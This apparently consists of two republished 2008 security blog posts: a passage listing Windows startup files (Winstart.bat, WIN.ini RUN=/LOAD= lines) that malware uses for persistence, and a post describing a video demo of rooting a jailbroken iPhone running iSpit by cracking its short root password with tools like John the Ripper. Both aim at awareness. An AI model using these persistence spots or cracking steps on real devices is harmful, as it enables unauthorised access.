1) Winstart.bat:    Windows executes all the instructions from this file.
2) WIN.ini       :    Windows executes all the instructions present in line starting with RUN= or LOAD=

These are not the only ways to execute programs at the start but are most common/easy ways to implement it. I hope this post will make you aware of some of the techniques that can be used to launch program at windows startup and also give you a hint on how to make sure that your computer is infected with virus/rootkits.

Originally posted 2008-06-18 06:47:59. Republished by Blog Post Promoter

hi,

Having said in my last blog, iSpit can allow remote user to gain root access to the iPhone; i am going to show you how easily one can gain root access and do whatever s/he wants on your iPhone.

In the following video, i have changed the default root password of my iPhone from alpine to password. This is to show that, even if people have changed their default password, its easy to crack them. Choosing weak root password will help us to finish the video demo quickly.

If you have read my previous blog regarding changing root password of iPhone, you must be knowing that iPhone password can not be more than 8 chars. So we should consider that attacker can always crack the password using freely available password cracking tools like – john the ripper, cain and able etc

In my demo network shown in video, there were two iPhones – Locked and Activated with AT&T and other is Unlocked, jailbreaked and installed with iSpit V1.5

[googlevideo=http://video.google.com/googleplayer.swf?docId=-2848727205364577090]

I know the video quality sucks, please bear with it. You can watch good quality video at milw0rm. Follow this link and search for bughira.

I hope you guys enjoyed the video and now you are smart enough to decide : should we install iSpit on iPhone or not?

Let me know if you have any questions/comments about the video.

Originally posted 2008-05-03 17:48:49. Republished by Blog Post Promoter